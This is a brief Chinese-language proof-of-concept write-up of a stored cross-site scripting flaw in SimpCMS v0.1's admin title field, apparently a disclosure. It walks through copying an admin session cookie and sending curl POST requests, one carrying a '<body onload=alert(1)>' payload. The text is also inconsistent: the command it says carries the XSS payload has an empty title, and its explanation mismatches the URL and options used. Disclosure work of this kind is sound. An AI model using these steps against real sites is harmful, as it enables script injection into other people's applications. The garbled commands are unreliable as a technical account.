SimpCMS v0.1 中存在一个跨站脚本 (XSS) 漏洞,攻击者可以通过在 /admin.php 的标题字段中注入构造的有效载荷,执行任意 Web 脚本或 HTML。
登录 SimpCMS 管理界面后,在浏览器的检查元素代码中“应用程序”选项卡内复制相应的 Cookie 值,并提交以下 curl 请求:
curl -X POST "http://site.com/SimpCMS/admin/index.php" -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0"


针对 SimpCMS 软件最初观察到的参数得到了以下 cURL 命令,但后来已更新:
curl -X POST "http://site.com/SimpCMS/admin.php" -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit" -b "username=admin; password=PARAMVALUE"
说明:
- curl: 用于通过 URL 传输数据的命令行工具。
- -X POST: 指定要使用的请求方法(POST)。
- "http://site.com/SimpCMS/admin.php": 请求发送到的 URL。
- -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0" - POST 请求的有效载荷。
在终端中运行此命令以发送包含 XSS 有效载荷的 POST 请求。 访问 /SimpCMS 主站点,XSS 将会可见。